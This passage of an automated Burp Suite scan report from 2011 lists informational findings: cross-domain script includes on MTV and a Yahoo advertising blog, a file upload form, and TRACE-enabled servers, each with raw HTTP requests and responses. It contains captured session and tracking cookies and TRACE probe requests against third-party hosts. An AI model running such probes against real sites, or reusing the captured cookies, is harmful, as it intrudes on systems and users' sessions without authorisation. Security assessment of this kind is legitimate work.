<head>
<m
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rhapsody.com/simple.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
19.35. http://www.mtv.com/games/arcade/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /games/arcade/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /games/arcade/ HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012547|check#true#1308010746; __cs_rr=1; s_cc=true; s_sq=viamtv%3D%2526pid%253D%25252Fonair%25252Fteen_wolf%25252Fseries.jhtml%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.mtv.com%25252Fgames%25252Farcade%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: c6a05617bd4cfbc396a4ca3feac213
Vary: Accept-Encoding
Cache-Control: max-age=481
Date: Tue, 14 Jun 2011 00:19:08 GMT
Content-Length: 45849
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<m
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
19.36. http://www.mtv.com/games/arcade/game/play.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /games/arcade/game/play.jhtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /games/arcade/game/play.jhtml?arcadeGameId=10325912 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012600|check#true#1308010800; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: de3234c31aebd5a0514286e2152d9433
Vary: Accept-Encoding
Cache-Control: max-age=591
Date: Tue, 14 Jun 2011 00:19:23 GMT
Content-Length: 18059
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<l
...[SNIP]...
</script>

<script type="text/javascript" src="http://games.mtvnservices.com/scripts/mtvngameloader.1.0.2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
19.37. http://www.mtv.com/music/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /music/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /music/ HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; mbox=check#true#1308010557|session#1308010496673-477284#1308012357; __cs_rr=1; s_cc=true; s_ppv=21; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_sq=viamtv%3D%2526pid%253D%25252Fhome%25252Findex.jhtml%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.mtv.com%25252Fmusic%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: f486598c52cd6d74c694e4d1e51979
Vary: Accept-Encoding
Cache-Control: max-age=54
Date: Tue, 14 Jun 2011 00:16:56 GMT
Content-Length: 81377
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<m
...[SNIP]...
<link href="/music/css/rhaptracks.css" type="text/css" rel="stylesheet"/>

<script type="text/javascript" src="http://www.rhapsody.com/simple.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
19.38. http://www.mtv.com/shows/teen_wolf/series.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /shows/teen_wolf/series.jhtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shows/teen_wolf/series.jhtml HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012528|check#true#1308010727; __cs_rr=1; s_cc=true; s_ppv=62; s_sq=viamtv%3D%2526pid%253D%25252Fvideos%25252Fmike-taylor%25252F659420%25252Fperfect.jhtml%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.mtv.com%25252Fshows%25252Fteen_wolf%25252Fseries.jhtml%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: f47580e6119abe4d311896cb4cdcdd
Vary: Accept-Encoding
Cache-Control: max-age=568
Date: Tue, 14 Jun 2011 00:18:02 GMT
Content-Length: 62859
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<m
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rhapsody.com/simple.js"></script>
...[SNIP]...
<p>

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>
<script type="text/javascript"
src="http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US">.
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
19.39. http://www.mtv.com/xd_flux.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /xd_flux.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xd_flux.html?callbackName=F13080112111260&args=setheight:453 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Mon, 08 Feb 2010 20:27:03 GMT
ETag: "4011b79-17d-47f1c9fc2d3c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 381
Cache-Control: max-age=1800
Date: Tue, 14 Jun 2011 00:27:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Cross-Domain F
...[SNIP]...
<body>
<script src="http://static0.fluxstatic.com/-/Clients/Common/JS/Common/xd_flux.js" type="text/javascript"></script>
...[SNIP]...
19.40. http://www.yadvertisingblog.com/blog/category/general/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yadvertisingblog.com
Path:   /blog/category/general/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/category/general/ HTTP/1.1
Host: www.yadvertisingblog.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/downloads/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=3647ebt6vdaa7&b=3&s=dp; y!survey=1; fpc10001494318262=v-Z-Or9d|qwoUoZiLaa|fses10001494318262=|qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; hubspotutk=2a9147469765436ba58d940ead33ec3a; hubspotvd=2a9147469765436ba58d940ead33ec3a; hubspotvw=2a9147469765436ba58d940ead33ec3a; hubspotvm=2a9147469765436ba58d940ead33ec3a; hsfirstvisit=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2F2011%2F05%2F31%2Fyahoo-launches-clear-ad-notice%2F|http%3A%2F%2Fadvertising.yahoo.com%2F|2011-06-13%2020%3A20%3A27; hubspotdt=2011-06-13%2020%3A26%3A36

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:27:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Pingback: http://www.yadvertisingblog.com/blog/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Age: 2
Proxy-Connection: close
Server: YTS/1.19.8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http
...[SNIP]...
</script>

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
19.41. http://www.yadvertisingblog.com/blog/downloads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yadvertisingblog.com
Path:   /blog/downloads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/downloads/ HTTP/1.1
Host: www.yadvertisingblog.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=3647ebt6vdaa7&b=3&s=dp; y!survey=1; fpc10001494318262=v-Z-Or9d|qwoUoZiLaa|fses10001494318262=|qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; hubspotdt=2011-06-13%2020%3A20%3A27; hubspotutk=2a9147469765436ba58d940ead33ec3a; hubspotvd=2a9147469765436ba58d940ead33ec3a; hubspotvw=2a9147469765436ba58d940ead33ec3a; hubspotvm=2a9147469765436ba58d940ead33ec3a; hsfirstvisit=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2F2011%2F05%2F31%2Fyahoo-launches-clear-ad-notice%2F|http%3A%2F%2Fadvertising.yahoo.com%2F|2011-06-13%2020%3A20%3A27

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:27:20 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Pingback: http://www.yadvertisingblog.com/blog/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Age: 2
Proxy-Connection: close
Server: YTS/1.19.8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http
...[SNIP]...
</script>
   <script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
19.42. http://www.yadvertisingblog.com/blog/wp-content/themes/yahooexchangeblog/images/favicon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yadvertisingblog.com
Path:   /blog/wp-content/themes/yahooexchangeblog/images/favicon.png

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/wp-content/themes/yahooexchangeblog/images/favicon.png HTTP/1.1
Host: www.yadvertisingblog.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=3647ebt6vdaa7&b=3&s=dp; y!survey=1; fpc10001494318262=v-Z-Or9d|qwoUoZiLaa|fses10001494318262=|qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; hubspotdt=2011-06-13%2020%3A20%3A27; hubspotutk=2a9147469765436ba58d940ead33ec3a; hubspotvd=2a9147469765436ba58d940ead33ec3a; hubspotvw=2a9147469765436ba58d940ead33ec3a; hubspotvm=2a9147469765436ba58d940ead33ec3a; hsfirstvisit=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2F2011%2F05%2F31%2Fyahoo-launches-clear-ad-notice%2F|http%3A%2F%2Fadvertising.yahoo.com%2F|2011-06-13%2020%3A20%3A27

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Jun 2011 00:21:42 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Cookie
X-Pingback: http://www.yadvertisingblog.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:21:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Age: 0
Proxy-Connection: close
Server: YTS/1.19.8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http
...[SNIP]...
</script>

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
19.43. http://www.yadvertisingblog.com/blog/wp-content/themes/yahooexchangeblogimages/img_topbar_arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yadvertisingblog.com
Path:   /blog/wp-content/themes/yahooexchangeblogimages/img_topbar_arrow.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/wp-content/themes/yahooexchangeblogimages/img_topbar_arrow.gif HTTP/1.1
Host: www.yadvertisingblog.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=3647ebt6vdaa7&b=3&s=dp

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Jun 2011 00:21:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Cookie
X-Pingback: http://www.yadvertisingblog.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:21:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Age: 0
Proxy-Connection: close
Server: YTS/1.19.8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http
...[SNIP]...
</script>

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
20. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chartupload.com
Path:   /

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET / HTTP/1.1
Host: chartupload.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 08:01:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 7741
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-us" xml:lang="en
...[SNIP]...
<p>
       <input name="userfile[]" type="file" size="50" /> <br />
...[SNIP]...
21. TRACE method is enabled  previous  next
There are 7 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

21.1. http://chartupload.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chartupload.com
Path:   /

Request

TRACE / HTTP/1.0
Host: chartupload.com
Cookie: d7d3c12a665ff80d

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 08:02:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: chartupload.com
Cookie: d7d3c12a665ff80d

21.2. http://cheetah.vizu.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cheetah.vizu.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cheetah.vizu.com
Cookie: 733ef9d508cc42fa

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:35 GMT
Server: PWS/1.7.2.3
X-Px: nc iad-agg-n35 ( origin>CONN)
Content-Length: 375
Content-Type: message/http
Connection: close

TRACE /ie/ HTTP/1.1
Host: adcatalyst.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n35.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.52.45
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://cheetah.vizu.com/
Cookie: 733ef9d508cc42fa; ptc=1879%3D728x90-1
Connection: keep-alive

21.3. http://puma.vizu.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /

Request

TRACE / HTTP/1.0
Host: puma.vizu.com
Cookie: ef07603884749a0c

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:30 GMT
Server: PWS/1.7.2.3
X-Px: nc iad-agg-n23 ( origin>CONN)
Content-Length: 365
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: origin.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n23.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.52.33
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://puma.vizu.com/
Cookie: ef07603884749a0c; ptc=1879%3D728x90-1
Connection: keep-alive

21.4. http://secure-us.imrworldwide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: 50c3757de4884f54

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:54 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 50c3757de4884f54; V5=AStfNgpFIF5WEhozICIjIyE6KkIkO1InHlKWAw__; IMRID=Tc1h14psGhMAAHNb-FY
Host: secure-us.imrworldwide.com

21.5. http://tm.verticalacuity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tm.verticalacuity.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tm.verticalacuity.com
Cookie: 8fc65b1f736c0de8

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Mon, 13 Jun 2011 14:42:59 GMT
Server: Apache
Content-Length: 180
Connection: Close

TRACE / HTTP/1.1
host: tm.verticalacuity.com
Cookie: 8fc65b1f736c0de8
